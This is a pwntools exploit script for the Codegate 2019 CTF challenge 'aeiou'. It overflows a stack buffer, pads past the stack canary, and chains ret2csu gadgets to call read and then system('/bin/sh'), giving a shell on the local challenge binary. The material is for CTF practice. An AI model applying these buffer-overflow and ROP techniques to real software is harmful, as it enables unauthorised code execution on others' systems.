Codegate 2019 CTF aeiou

exploit.py

from pwn import *
  
p = process("./aeiou")

e = ELF("./aeiou")
l = e.libc


def csu_chain(addr,argv1,argv2,argv3,mode=1):
    payload = ""
    if mode!=0:
        payload += "A"*8
    payload += p64(0) 
    payload += p64(1) 
    payload += p64(addr) 
    payload += p64(argv3) 
    payload += p64(argv2) 
    payload += p64(argv1)
    payload += p64(csu_2)

    return payload

binsh = "/bin/sh\x00"
csu_1 = 0x4026EA
csu_2 = 0x4026D0
ret = 0x400b29

payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)
payload += csu_chain(e.got['system'],e.bss(),0,0)
canary = "A"*(6224-len(payload))
payload += canary

p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
p.sendline(binsh)
p.interactive()